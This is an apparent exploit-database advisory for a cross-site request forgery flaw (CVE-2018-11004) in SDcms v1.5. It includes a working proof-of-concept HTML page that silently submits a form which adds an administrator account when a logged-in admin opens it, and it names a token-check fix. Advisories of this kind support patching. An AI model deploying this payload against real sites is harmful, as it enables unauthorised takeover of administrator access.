SDcms v1.5 CVE-2018-11004 – Cross-site request forgery

Authors:TekerFue                 Risk:High

CVE:CVE-2018-11004              0day:Cross-site request forgery 

0day -id:0DAY-176170             Date:2018-05-13

Description

An issue was discovered in SDcms v1.5. Cross-site request forgery (CSRF) vulnerability in /WWW//app/admin/controller/admincontroller.php allows remote attackers to add administrator accounts via m=admin&c=admin&a=add.

Analysis

In 19th of admincontroller.php script:

We can find that this script does not have an anti-csrf mechanism.

POC

Logined administrator clicks the url:http://192.168.232.133/evil.html

payload

http://127.0.0.1/?m=admin&c=admin&a=add

evil.html:
<html>
	<p>this is a test</p>
	<form action="http://127.0.0.1/?m=admin&c=admin&a=add" method="post">
		<input type="text" name="t0" value="test">
		<input type="text" name="t1"  value="123456">
		<input type="text" name="t2"  value="test">
		<input type="text" name="t3" value="0">
		<input type="text" name="t4" value="1">
  </form>
	<script>document.forms[0].submit();</script>
</html>

Repair method

Join the random token check

Leave a Reply